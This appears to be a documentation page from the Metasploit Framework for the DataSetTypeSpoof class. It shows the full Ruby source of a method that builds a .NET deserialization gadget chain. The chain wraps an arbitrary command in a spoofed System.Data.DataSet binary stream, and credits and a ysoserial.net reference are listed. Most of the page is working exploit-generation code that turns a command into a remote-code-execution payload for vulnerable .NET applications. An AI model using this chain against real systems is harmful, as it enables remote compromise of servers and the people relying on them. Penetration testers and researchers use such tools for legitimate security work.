Class: Msf::Util::DotNetDeserialization::GadgetChains::DataSetTypeSpoof

Inherits:
Types::SerializedStream show all
Defined in:
lib/msf/util/dot_net_deserialization/gadget_chains/data_set_type_spoof.rb

Class Method Summary collapse

Methods inherited from Types::SerializedStream

from_values, #get_object, #set_object

Class Method Details

.generate(cmd) ⇒ Object

DataSetTypeSpoof

Credits:
  Finders: James Forshaw
  Contributors: Soroush Dalili, Markus Wulftange, Jang
References:
  https://github.com/pwntester/ysoserial.net/blob/b486d8bbaed82e1959750ee36f4ab88d91bccc67/ysoserial/Generators/DataSetTypeSpoofGenerator.cs


15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
# File 'lib/msf/util/dot_net_deserialization/gadget_chains/data_set_type_spoof.rb', line 15

def self.generate(cmd)
  inner = GadgetChains::TextFormattingRunProperties.generate(cmd)
  system_data = Assemblies::VERSIONS['4.0.0.0'].fetch('System.Data')
  library = Types::RecordValues::BinaryLibrary.new(
    library_id: 3,
    library_name: system_data.to_s
  )

  self.from_values([
    Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),
    Types::RecordValues::BinaryLibrary.new(library_id: 2, library_name: 'mscorlib'),
    library,
    Types::RecordValues::ClassWithMembersAndTypes.new(
      class_info: Types::General::ClassInfo.new(
        obj_id: 1,
        name: 'System.Data.DataSet, System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        member_names: %w[
          DataSet.RemotingFormat
          DataSet.DataSetName
          DataSet.Namespace
          DataSet.Prefix
          DataSet.CaseSensitive
          DataSet.LocaleLCID
          DataSet.EnforceConstraints
          DataSet.ExtendedProperties
          DataSet.Tables.Count
          DataSet.Tables_0
        ]
      ),
      member_type_info: Types::General::MemberTypeInfo.new(
        binary_type_enums: %i{ Class String String String Primitive Primitive Primitive Object Primitive PrimitiveArray },
        additional_infos: [
          {type_name: 'System.Data.SerializationFormat', library_id: library.library_id},
          1,
          8,
          1,
          8,
          2
        ]
      ),
      library_id: 2,
      member_values: [
        Types::Record.from_value(Types::RecordValues::ClassWithMembersAndTypes.new(
          class_info: Types::General::ClassInfo.new(
            obj_id: -4,
            name: 'System.Data.SerializationFormat',
            member_names: %w[ value__ ]
          ),
          member_type_info: Types::General::MemberTypeInfo.new(
            binary_type_enums: %i{ Primitive },
            additional_infos: [ 8 ]
          ),
          library_id: library.library_id,
          member_values: [ 1 ]
        )),
        Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(obj_id: 5)),
        Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 5)),
        Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 5)),
        false,
        1033,
        false,
        Types::Record.from_value(Types::RecordValues::ObjectNull.new),
        1,
        Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 6))
      ]
    ),
    Types::RecordValues::ArraySinglePrimitive.new(
      array_info: {
        obj_id: 6,
        member_count: inner.num_bytes
      },
      primitive_type_enum: Enums::PrimitiveTypeEnum[:Byte],
      members: inner.to_binary_s.bytes
    ),
    Types::RecordValues::MessageEnd.new
  ])
end